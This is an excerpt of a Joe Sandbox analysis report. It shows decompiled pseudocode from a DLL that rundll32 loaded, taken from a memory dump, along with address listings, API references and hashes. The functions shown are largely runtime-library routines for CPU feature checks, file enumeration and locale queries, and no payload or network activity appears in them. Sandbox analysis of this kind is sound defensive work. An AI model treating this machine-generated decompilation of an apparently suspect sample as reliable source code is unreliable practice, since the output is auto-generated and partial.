				asm("cpuid");
				_t75 = _t74;
				 *_t93 = 0;
				 *((intOrPtr*)(_t93 + 4)) = _t74;
				 *((intOrPtr*)(_t93 + 8)) = 0;
				 *(_t93 + 0xc) = _t90;
				_v16 = _v40;
				_v12 = _v28 ^ 0x49656e69;
				_v8 = _v36 ^ 0x756e6547;
				_push(_t75);
				asm("cpuid");
				_t77 =  &_v40;
				 *_t77 = 1;
				 *((intOrPtr*)(_t77 + 4)) = _t75;
				 *((intOrPtr*)(_t77 + 8)) = 0;
				 *(_t77 + 0xc) = _t90;
				if((_v8 | _v32 ^ 0x6c65746e | _v12) != 0) {
					L9:
					_t96 =  *0x6e78ccb4; // 0x2
					L10:
					_t85 = _v32;
					_t60 = 7;
					_v8 = _t85;
					if(_v16 < _t60) {
						_t78 = _v20;
					} else {
						_push(_t77);
						asm("cpuid");
						_t82 =  &_v40;
						 *_t82 = _t60;
						 *((intOrPtr*)(_t82 + 4)) = _t77;
						 *((intOrPtr*)(_t82 + 8)) = 0;
						_t85 = _v8;
						 *(_t82 + 0xc) = _t90;
						_t78 = _v36;
						if((_t78 & 0x00000200) != 0) {
							 *0x6e78ccb4 = _t96 | 0x00000002;
						}
					}
					_t61 =  *0x6e78c010; // 0x2f
					_t62 = _t61 | 0x00000002;
					 *0x6e78ccb0 = 1;
					 *0x6e78c010 = _t62;
					if((_t85 & 0x00100000) != 0) {
						_t63 = _t62 | 0x00000004;
						 *0x6e78ccb0 = 2;
						 *0x6e78c010 = _t63;
						if((_t85 & 0x08000000) != 0 && (_t85 & 0x10000000) != 0) {
							asm("xgetbv");
							_v24 = _t63;
							_v20 = _t90;
							_t104 = 6;
							if((_v24 & _t104) == _t104) {
								_t66 =  *0x6e78c010; // 0x2f
								_t67 = _t66 | 0x00000008;
								 *0x6e78ccb0 = 3;
								 *0x6e78c010 = _t67;
								if((_t78 & 0x00000020) != 0) {
									 *0x6e78ccb0 = 5;
									 *0x6e78c010 = _t67 | 0x00000020;
									if((_t78 & 0xd0030000) == 0xd0030000 && (_v24 & 0x000000e0) == 0xe0) {
										 *0x6e78c010 =  *0x6e78c010 | 0x00000040;
										 *0x6e78ccb0 = _t104;
									}
								}
							}
						}
					}
					goto L23;
				}
				_t73 = _v40 & 0x0fff3ff0;
				if(_t73 == 0x106c0 || _t73 == 0x20660 || _t73 == 0x20670 || _t73 == 0x30650 || _t73 == 0x30660 || _t73 == 0x30670) {
					_t99 =  *0x6e78ccb4; // 0x2
					_t96 = _t99 | 0x00000001;
					 *0x6e78ccb4 = _t96;
					goto L10;
				} else {
					goto L9;
				}
			}






























                                                      0x6e7792e1
                                                      0x6e7792e4
                                                      0x6e7792ee
                                                      0x6e7792ff
                                                      0x6e7794ae
                                                      0x6e7794b1
                                                      0x6e7794b1
                                                      0x6e779305
                                                      0x6e77930b
                                                      0x6e779310
                                                      0x6e779314
                                                      0x6e779318
                                                      0x6e779319
                                                      0x6e77931b
                                                      0x6e77931e
                                                      0x6e779323
                                                      0x6e77932c
                                                      0x6e77933d
                                                      0x6e779348
                                                      0x6e77934e
                                                      0x6e77934f
                                                      0x6e779354
                                                      0x6e779357
                                                      0x6e77935c
                                                      0x6e779364
                                                      0x6e779367
                                                      0x6e77936a
                                                      0x6e7793af
                                                      0x6e7793af
                                                      0x6e7793b5
                                                      0x6e7793b5
                                                      0x6e7793ba
                                                      0x6e7793bb
                                                      0x6e7793c1
                                                      0x6e7793f2
                                                      0x6e7793c3
                                                      0x6e7793c5
                                                      0x6e7793c6
                                                      0x6e7793cb
                                                      0x6e7793ce
                                                      0x6e7793d0
                                                      0x6e7793d3
                                                      0x6e7793d6
                                                      0x6e7793d9
                                                      0x6e7793dc
                                                      0x6e7793e5
                                                      0x6e7793ea
                                                      0x6e7793ea
                                                      0x6e7793e5
                                                      0x6e7793f5
                                                      0x6e7793fa
                                                      0x6e7793fd
                                                      0x6e779407
                                                      0x6e779412
                                                      0x6e779418
                                                      0x6e77941b
                                                      0x6e779425
                                                      0x6e779430
                                                      0x6e77943c
                                                      0x6e77943f
                                                      0x6e779442
                                                      0x6e77944d
                                                      0x6e779452
                                                      0x6e779454
                                                      0x6e779459
                                                      0x6e77945c
                                                      0x6e779466
                                                      0x6e77946e
                                                      0x6e779473
                                                      0x6e77947d
                                                      0x6e77948b
                                                      0x6e77949e
                                                      0x6e7794a5
                                                      0x6e7794a5
                                                      0x6e77948b
                                                      0x6e77946e
                                                      0x6e779452
                                                      0x6e779430
                                                      0x00000000
                                                      0x6e7794ad
                                                      0x6e77936f
                                                      0x6e779379
                                                      0x6e77939e
                                                      0x6e7793a4
                                                      0x6e7793a7
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000

                                                      APIs
                                                      • IsProcessorFeaturePresent.KERNEL32 ref: 6E7792F7
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: FeaturePresentProcessor
                                                      • String ID:
                                                      • API String ID: 2325560087-0
                                                      • Opcode ID: 89d2b3fb372b20eca63907e363167e7257076d2e4553b58aae5ce3e991d078d9
                                                      • Instruction ID: 32e12da26e372199a1ef2941ec058a58eda3d591709ba036eb99955a850c5025
                                                      • Opcode Fuzzy Hash: 89d2b3fb372b20eca63907e363167e7257076d2e4553b58aae5ce3e991d078d9
                                                      • Instruction Fuzzy Hash: A051BCB1A056058FDF20CF98D9817AEBBF4FB5A355F21863AC815EB290E3759940CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E77F61E, Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 79%
                                                      			E6E77F61E(void* __ecx, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				union _FINDEX_INFO_LEVELS _v28;
				intOrPtr* _v32;
				intOrPtr _v36;
				signed int _v48;
				struct _WIN32_FIND_DATAW _v604;
				char _v605;
				intOrPtr* _v612;
				union _FINDEX_INFO_LEVELS _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				signed int _v628;
				union _FINDEX_INFO_LEVELS _v632;
				union _FINDEX_INFO_LEVELS _v636;
				signed int _v640;
				signed int _v644;
				union _FINDEX_INFO_LEVELS _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				signed int _v664;
				union _FINDEX_INFO_LEVELS _v668;
				union _FINDEX_INFO_LEVELS _v672;
				void* __ebx;
				void* __edi;
				intOrPtr _t68;
				signed int _t73;
				signed int _t75;
				char _t77;
				signed char _t78;
				signed int _t84;
				signed int _t94;
				signed int _t97;
				union _FINDEX_INFO_LEVELS _t98;
				intOrPtr* _t106;
				signed int _t109;
				intOrPtr _t117;
				signed int _t119;
				signed int _t122;
				signed int _t124;
				void* _t127;
				union _FINDEX_INFO_LEVELS _t128;
				void* _t129;
				intOrPtr* _t131;
				intOrPtr* _t134;
				signed int _t136;
				intOrPtr* _t139;
				signed int _t144;
				signed int _t150;
				void* _t156;
				signed int _t159;
				intOrPtr _t161;
				void* _t162;
				void* _t166;
				void* _t167;
				signed int _t168;
				signed int _t171;
				void* _t172;
				signed int _t173;
				void* _t174;
				void* _t175;

				_push(__ecx);
				_t134 = _a4;
				_t2 = _t134 + 1; // 0x1
				_t156 = _t2;
				do {
					_t68 =  *_t134;
					_t134 = _t134 + 1;
				} while (_t68 != 0);
				_t159 = _a12;
				_t136 = _t134 - _t156 + 1;
				_v8 = _t136;
				if(_t136 <=  !_t159) {
					_push(__esi);
					_t5 = _t159 + 1; // 0x1
					_t127 = _t5 + _t136;
					_t166 = E6E77D5E9(_t127, 1);
					__eflags = _t159;
					if(_t159 == 0) {
						L7:
						_push(_v8);
						_t127 = _t127 - _t159;
						_t73 = E6E781F87(_t166 + _t159, _t127, _a4);
						_t173 = _t172 + 0x10;
						__eflags = _t73;
						if(_t73 != 0) {
							goto L12;
						} else {
							_t131 = _a16;
							_t119 = E6E77FA19(_t131);
							_v8 = _t119;
							__eflags = _t119;
							if(_t119 == 0) {
								 *( *(_t131 + 4)) = _t166;
								_t168 = 0;
								_t14 = _t131 + 4;
								 *_t14 =  *(_t131 + 4) + 4;
								__eflags =  *_t14;
							} else {
								E6E77D646(_t166);
								_t168 = _v8;
							}
							E6E77D646(0);
							_t122 = _t168;
							goto L4;
						}
					} else {
						_push(_t159);
						_t124 = E6E781F87(_t166, _t127, _a8);
						_t173 = _t172 + 0x10;
						__eflags = _t124;
						if(_t124 != 0) {
							L12:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E6E77D4EE();
							asm("int3");
							_t171 = _t173;
							_t174 = _t173 - 0x298;
							_t75 =  *0x6e78c00c; // 0x9bbef7a8
							_v48 = _t75 ^ _t171;
							_t139 = _v32;
							_t157 = _v28;
							_push(_t127);
							_push(0);
							_t161 = _v36;
							_v648 = _t157;
							__eflags = _t139 - _t161;
							if(_t139 != _t161) {
								while(1) {
									_t117 =  *_t139;
									__eflags = _t117 - 0x2f;
									if(_t117 == 0x2f) {
										break;
									}
									__eflags = _t117 - 0x5c;
									if(_t117 != 0x5c) {
										__eflags = _t117 - 0x3a;
										if(_t117 != 0x3a) {
											_t139 = E6E781FE0(_t161, _t139);
											__eflags = _t139 - _t161;
											if(_t139 != _t161) {
												continue;
											}
										}
									}
									break;
								}
								_t157 = _v612;
							}
							_t77 =  *_t139;
							_v605 = _t77;
							__eflags = _t77 - 0x3a;
							if(_t77 != 0x3a) {
								L23:
								_t128 = 0;
								__eflags = _t77 - 0x2f;
								if(__eflags == 0) {
									L26:
									_t78 = 1;
								} else {
									__eflags = _t77 - 0x5c;
									if(__eflags == 0) {
										goto L26;
									} else {
										__eflags = _t77 - 0x3a;
										_t78 = 0;
										if(__eflags == 0) {
											goto L26;
										}
									}
								}
								_v672 = _t128;
								_v668 = _t128;
								_push(_t166);
								asm("sbb eax, eax");
								_v664 = _t128;
								_v660 = _t128;
								_v640 =  ~(_t78 & 0x000000ff) & _t139 - _t161 + 0x00000001;
								_v656 = _t128;
								_v652 = _t128;
								_t84 = E6E77F412(_t139 - _t161 + 1, _t161,  &_v672, E6E77F926(_t157, __eflags));
								_t175 = _t174 + 0xc;
								asm("sbb eax, eax");
								_t167 = FindFirstFileExW( !( ~_t84) & _v664, _t128,  &_v604, _t128, _t128, _t128);
								__eflags = _t167 - 0xffffffff;
								if(_t167 != 0xffffffff) {
									_t144 =  *((intOrPtr*)(_v612 + 4)) -  *_v612;
									__eflags = _t144;
									_t145 = _t144 >> 2;
									_v644 = _t144 >> 2;
									do {
										_v636 = _t128;
										_v632 = _t128;
										_v628 = _t128;
										_v624 = _t128;
										_v620 = _t128;
										_v616 = _t128;
										_t94 = E6E77F343( &(_v604.cFileName),  &_v636,  &_v605, E6E77F926(_t157, __eflags));
										_t175 = _t175 + 0x10;
										asm("sbb eax, eax");
										_t97 =  !( ~_t94) & _v628;
										__eflags =  *_t97 - 0x2e;
										if( *_t97 != 0x2e) {
											L34:
											_push(_v612);
											_t98 = E6E77F61E(_t145, _t167, _t97, _t161, _v640);
											_t175 = _t175 + 0x10;
											_v648 = _t98;
											__eflags = _t98;
											if(_t98 != 0) {
												__eflags = _v616 - _t128;
												if(_v616 != _t128) {
													E6E77D646(_v628);
													_t98 = _v648;
												}
												_t128 = _t98;
											} else {
												goto L35;
											}
										} else {
											_t145 =  *((intOrPtr*)(_t97 + 1));
											__eflags = _t145;
											if(_t145 == 0) {
												goto L35;
											} else {
												__eflags = _t145 - 0x2e;
												if(_t145 != 0x2e) {
													goto L34;
												} else {
													__eflags =  *((intOrPtr*)(_t97 + 2)) - _t128;
													if( *((intOrPtr*)(_t97 + 2)) == _t128) {
														goto L35;
													} else {
														goto L34;
													}
												}
											}
										}
										L43:
										FindClose(_t167);
										goto L44;
										L35:
										__eflags = _v616 - _t128;
										if(_v616 != _t128) {
											E6E77D646(_v628);
											_pop(_t145);
										}
										__eflags = FindNextFileW(_t167,  &_v604);
									} while (__eflags != 0);
									_t106 = _v612;
									_t150 = _v644;
									_t157 =  *_t106;
									_t109 =  *((intOrPtr*)(_t106 + 4)) -  *_t106 >> 2;
									__eflags = _t150 - _t109;
									if(_t150 != _t109) {
										E6E781A90(_t157, _t157 + _t150 * 4, _t109 - _t150, 4, E6E77F279);
									}
									goto L43;
								} else {
									_push(_v612);
									_t128 = E6E77F61E( &_v604, _t167, _t161, _t128, _t128);
								}
								L44:
								__eflags = _v652;
								_pop(_t166);
								if(_v652 != 0) {
									E6E77D646(_v664);
								}
							} else {
								__eflags = _t139 - _t161 + 1;
								if(_t139 == _t161 + 1) {
									_t77 = _v605;
									goto L23;
								} else {
									_push(_t157);
									E6E77F61E(_t139, _t166, _t161, 0, 0);
								}
							}
							_pop(_t162);
							__eflags = _v12 ^ _t171;
							_pop(_t129);
							return E6E778727(_t129, _v12 ^ _t171, _t157, _t162, _t166);
						} else {
							goto L7;
						}
					}
				} else {
					_t122 = 0xc;
					L4:
					return _t122;
				}
			}

































































                                                      0x6e77f623
                                                      0x6e77f624
                                                      0x6e77f627
                                                      0x6e77f627
                                                      0x6e77f62a
                                                      0x6e77f62a
                                                      0x6e77f62c
                                                      0x6e77f62d
                                                      0x6e77f632
                                                      0x6e77f639
                                                      0x6e77f63c
                                                      0x6e77f641
                                                      0x6e77f64a
                                                      0x6e77f64b
                                                      0x6e77f64e
                                                      0x6e77f658
                                                      0x6e77f65c
                                                      0x6e77f65e
                                                      0x6e77f672
                                                      0x6e77f672
                                                      0x6e77f675
                                                      0x6e77f67f
                                                      0x6e77f684
                                                      0x6e77f687
                                                      0x6e77f689
                                                      0x00000000
                                                      0x6e77f68b
                                                      0x6e77f68b
                                                      0x6e77f690
                                                      0x6e77f697
                                                      0x6e77f69a
                                                      0x6e77f69c
                                                      0x6e77f6ad
                                                      0x6e77f6af
                                                      0x6e77f6b1
                                                      0x6e77f6b1
                                                      0x6e77f6b1
                                                      0x6e77f69e
                                                      0x6e77f69f
                                                      0x6e77f6a4
                                                      0x6e77f6a7
                                                      0x6e77f6b6
                                                      0x6e77f6bc
                                                      0x00000000
                                                      0x6e77f6bf
                                                      0x6e77f660
                                                      0x6e77f660
                                                      0x6e77f666
                                                      0x6e77f66b
                                                      0x6e77f66e
                                                      0x6e77f670
                                                      0x6e77f6c2
                                                      0x6e77f6c4
                                                      0x6e77f6c5
                                                      0x6e77f6c6
                                                      0x6e77f6c7
                                                      0x6e77f6c8
                                                      0x6e77f6c9
                                                      0x6e77f6ce
                                                      0x6e77f6d2
                                                      0x6e77f6d4
                                                      0x6e77f6da
                                                      0x6e77f6e1
                                                      0x6e77f6e4
                                                      0x6e77f6e7
                                                      0x6e77f6ea
                                                      0x6e77f6eb
                                                      0x6e77f6ec
                                                      0x6e77f6ef
                                                      0x6e77f6f5
                                                      0x6e77f6f7
                                                      0x6e77f6f9
                                                      0x6e77f6f9
                                                      0x6e77f6fb
                                                      0x6e77f6fd
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77f6ff
                                                      0x6e77f701
                                                      0x6e77f703
                                                      0x6e77f705
                                                      0x6e77f710
                                                      0x6e77f712
                                                      0x6e77f714
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77f714
                                                      0x6e77f705
                                                      0x00000000
                                                      0x6e77f701
                                                      0x6e77f716
                                                      0x6e77f716
                                                      0x6e77f71c
                                                      0x6e77f71e
                                                      0x6e77f724
                                                      0x6e77f726
                                                      0x6e77f748
                                                      0x6e77f748
                                                      0x6e77f74a
                                                      0x6e77f74c
                                                      0x6e77f758
                                                      0x6e77f758
                                                      0x6e77f74e
                                                      0x6e77f74e
                                                      0x6e77f750
                                                      0x00000000
                                                      0x6e77f752
                                                      0x6e77f752
                                                      0x6e77f754
                                                      0x6e77f756
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77f756
                                                      0x6e77f750
                                                      0x6e77f760
                                                      0x6e77f768
                                                      0x6e77f76e
                                                      0x6e77f76f
                                                      0x6e77f771
                                                      0x6e77f779
                                                      0x6e77f77f
                                                      0x6e77f785
                                                      0x6e77f78b
                                                      0x6e77f79f
                                                      0x6e77f7a4
                                                      0x6e77f7af
                                                      0x6e77f7c5
                                                      0x6e77f7c7
                                                      0x6e77f7ca
                                                      0x6e77f7ed
                                                      0x6e77f7ed
                                                      0x6e77f7ef
                                                      0x6e77f7f2
                                                      0x6e77f7f8
                                                      0x6e77f7f8
                                                      0x6e77f7fe
                                                      0x6e77f804
                                                      0x6e77f80a
                                                      0x6e77f810
                                                      0x6e77f816
                                                      0x6e77f837
                                                      0x6e77f83c
                                                      0x6e77f841
                                                      0x6e77f845
                                                      0x6e77f84b
                                                      0x6e77f84e
                                                      0x6e77f861
                                                      0x6e77f861
                                                      0x6e77f86f
                                                      0x6e77f874
                                                      0x6e77f877
                                                      0x6e77f87d
                                                      0x6e77f87f
                                                      0x6e77f8dd
                                                      0x6e77f8e3
                                                      0x6e77f8eb
                                                      0x6e77f8f0
                                                      0x6e77f8f6
                                                      0x6e77f8f7
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77f850
                                                      0x6e77f850
                                                      0x6e77f853
                                                      0x6e77f855
                                                      0x00000000
                                                      0x6e77f857
                                                      0x6e77f857
                                                      0x6e77f85a
                                                      0x00000000
                                                      0x6e77f85c
                                                      0x6e77f85c
                                                      0x6e77f85f
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77f85f
                                                      0x6e77f85a
                                                      0x6e77f855
                                                      0x6e77f8f9
                                                      0x6e77f8fa
                                                      0x00000000
                                                      0x6e77f881
                                                      0x6e77f881
                                                      0x6e77f887
                                                      0x6e77f88f
                                                      0x6e77f894
                                                      0x6e77f894
                                                      0x6e77f8a3
                                                      0x6e77f8a3
                                                      0x6e77f8ab
                                                      0x6e77f8b1
                                                      0x6e77f8b7
                                                      0x6e77f8be
                                                      0x6e77f8c1
                                                      0x6e77f8c3
                                                      0x6e77f8d3
                                                      0x6e77f8d8
                                                      0x00000000
                                                      0x6e77f7cc
                                                      0x6e77f7cc
                                                      0x6e77f7dd
                                                      0x6e77f7dd
                                                      0x6e77f900
                                                      0x6e77f900
                                                      0x6e77f907
                                                      0x6e77f908
                                                      0x6e77f910
                                                      0x6e77f915
                                                      0x6e77f728
                                                      0x6e77f72b
                                                      0x6e77f72d
                                                      0x6e77f742
                                                      0x00000000
                                                      0x6e77f72f
                                                      0x6e77f72f
                                                      0x6e77f735
                                                      0x6e77f73a
                                                      0x6e77f72d
                                                      0x6e77f91b
                                                      0x6e77f91c
                                                      0x6e77f91e
                                                      0x6e77f925
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77f670
                                                      0x6e77f643
                                                      0x6e77f645
                                                      0x6e77f646
                                                      0x6e77f648
                                                      0x6e77f648

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b1335caa48a8331878acb895273f7668e5392d464bf26e3869cd31a53dc28b19
                                                      • Instruction ID: 9e94da46ffc3fcac5f8f70c17e5164196306b2a3982a92bf09ccc40f6c3835cd
                                                      • Opcode Fuzzy Hash: b1335caa48a8331878acb895273f7668e5392d464bf26e3869cd31a53dc28b19
                                                      • Instruction Fuzzy Hash: B041B575804619AFDF24DFA9CD88AEAB7BDEF45304F2442E9E41DD3220D6349E848F50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E806B90, Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 6E7F7D21: GetLastError.KERNEL32(00000008,6E849A90,6E80076C), ref: 6E7F7D25
                                                        • Part of subcall function 6E7F7D21: _free.LIBCMT ref: 6E7F7D58
                                                        • Part of subcall function 6E7F7D21: SetLastError.KERNEL32(00000000,6E849A00,6E849A90), ref: 6E7F7D99
                                                        • Part of subcall function 6E7F7D21: _abort.LIBCMT ref: 6E7F7D9F
                                                        • Part of subcall function 6E7F7D21: _free.LIBCMT ref: 6E7F7D80
                                                        • Part of subcall function 6E7F7D21: SetLastError.KERNEL32(00000000,6E849A00,6E849A90), ref: 6E7F7D8D
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6E806BE4
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$_free$InfoLocale_abort
                                                      • String ID:
                                                      • API String ID: 1663032902-0
                                                      • Opcode ID: b4d8a038b280d87f5337fadfd41a92f00092e7e5f049eb195669963d05523867
                                                      • Instruction ID: 04ac02d97edd817c59fb1b738cda4b8e18b090c9cc93c795cf40b40398de27df
                                                      • Opcode Fuzzy Hash: b4d8a038b280d87f5337fadfd41a92f00092e7e5f049eb195669963d05523867
                                                      • Instruction Fuzzy Hash: 6921D43252420BABDB58DFA8DC41BAA73BCEF45314F00497AED01C6580EB35DD85DB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E806818, Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 6E7F7D21: GetLastError.KERNEL32(00000008,6E849A90,6E80076C), ref: 6E7F7D25
                                                        • Part of subcall function 6E7F7D21: _free.LIBCMT ref: 6E7F7D58
                                                        • Part of subcall function 6E7F7D21: SetLastError.KERNEL32(00000000,6E849A00,6E849A90), ref: 6E7F7D99
                                                        • Part of subcall function 6E7F7D21: _abort.LIBCMT ref: 6E7F7D9F
                                                      • EnumSystemLocalesW.KERNEL32(6E806940,00000001,00000000,?,6E7F86F8,?,6E806F6D,00000000,?,?,?), ref: 6E80688A
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                      • String ID:
                                                      • API String ID: 1084509184-0
                                                      • Opcode ID: b8f708333288fbd28d8e643ff317f98bfc332c3817b749d6e53034b74321d5a6
                                                      • Instruction ID: 1780b202fe7f07866590f183de5faf483952e94820aaf1eaba45cf2d355f2500
                                                      • Opcode Fuzzy Hash: b8f708333288fbd28d8e643ff317f98bfc332c3817b749d6e53034b74321d5a6
                                                      • Instruction Fuzzy Hash: D21125372247019FDB089FB8C8916BAB7A1FF84328B18482CD98687F40D371B582D740
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E806DC0, Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 6E7F7D21: GetLastError.KERNEL32(00000008,6E849A90,6E80076C), ref: 6E7F7D25
                                                        • Part of subcall function 6E7F7D21: _free.LIBCMT ref: 6E7F7D58
                                                        • Part of subcall function 6E7F7D21: SetLastError.KERNEL32(00000000,6E849A00,6E849A90), ref: 6E7F7D99
                                                        • Part of subcall function 6E7F7D21: _abort.LIBCMT ref: 6E7F7D9F
                                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,6E806B5E,00000000,00000000,?), ref: 6E806DEC
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$InfoLocale_abort_free
                                                      • String ID:
                                                      • API String ID: 2692324296-0
                                                      • Opcode ID: 5a6947be81a80913fba9131eb83aeee68d3596fd0989d4c908e12abe043f031e
                                                      • Instruction ID: e472ad600fafdb1df8618d3c14fae9f6c4796a082f0766fe433d4b92e0a59f6e
                                                      • Opcode Fuzzy Hash: 5a6947be81a80913fba9131eb83aeee68d3596fd0989d4c908e12abe043f031e
                                                      • Instruction Fuzzy Hash: 57F0F932920617AFDB244BA5DC05BFB7BA8EB40718F104C29DC19A3980EB75FD81D6D0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E8068B3, Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 6E7F7D21: GetLastError.KERNEL32(00000008,6E849A90,6E80076C), ref: 6E7F7D25
                                                        • Part of subcall function 6E7F7D21: _free.LIBCMT ref: 6E7F7D58
                                                        • Part of subcall function 6E7F7D21: SetLastError.KERNEL32(00000000,6E849A00,6E849A90), ref: 6E7F7D99
                                                        • Part of subcall function 6E7F7D21: _abort.LIBCMT ref: 6E7F7D9F
                                                      • EnumSystemLocalesW.KERNEL32(6E806B90,00000001,?,?,6E7F86F8,?,6E806F31,6E7F86F8,?,?,?,?,?,6E7F86F8,?,?), ref: 6E8068FF
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                      • String ID:
                                                      • API String ID: 1084509184-0
                                                      • Opcode ID: 13d0aaac31c91ebf54833b406564391279cb419911490dd18e80c1972c2ae649
                                                      • Instruction ID: 9141ffe21ad3053132340051d65a0e1594c8c33e0203b4001cd9814de674803a
                                                      • Opcode Fuzzy Hash: 13d0aaac31c91ebf54833b406564391279cb419911490dd18e80c1972c2ae649
                                                      • Instruction Fuzzy Hash: 48F046322243055FD7149FB99C90ABA7BE5FF8032CB044C3CE9058BE80D771A882D650
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7FC8E3, Relevance: 1.5, APIs: 1, Instructions: 37COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,6E7F80DB,?,00000004), ref: 6E7FC936
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: InfoLocale
                                                      • String ID:
                                                      • API String ID: 2299586839-0
                                                      • Opcode ID: a4b16b38c13577f87608e42fffc02999774df0d8f03ce81c9a8c8bd6258a37df
                                                      • Instruction ID: a4fe7c5ce0f06a60e6e8fc26f8774f4c2e7e3905ecfe9ae9d4c9d61541a363f6
                                                      • Opcode Fuzzy Hash: a4b16b38c13577f87608e42fffc02999774df0d8f03ce81c9a8c8bd6258a37df
                                                      • Instruction Fuzzy Hash: 03F0A932600609BBCF01AFA09E04EEE3B69EB19711F000969B8096E360CA3199209A89
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7FBF12, Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 6E7E9A62: RtlEnterCriticalSection.NTDLL(-6E855D97), ref: 6E7E9A71
                                                      • EnumSystemLocalesW.KERNEL32(6E7FBECC,00000001,6E8474C0,0000000C), ref: 6E7FBF4A
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                                      • String ID:
                                                      • API String ID: 1272433827-0
                                                      • Opcode ID: cb4071320cc1499e5a5c1304804e1570699d05f0dfaa905e643ba1de8538af2c
                                                      • Instruction ID: 06ec5b840688d1208f9a97402977caf2ef539fe0ccbc2826b575a7580ace9f43
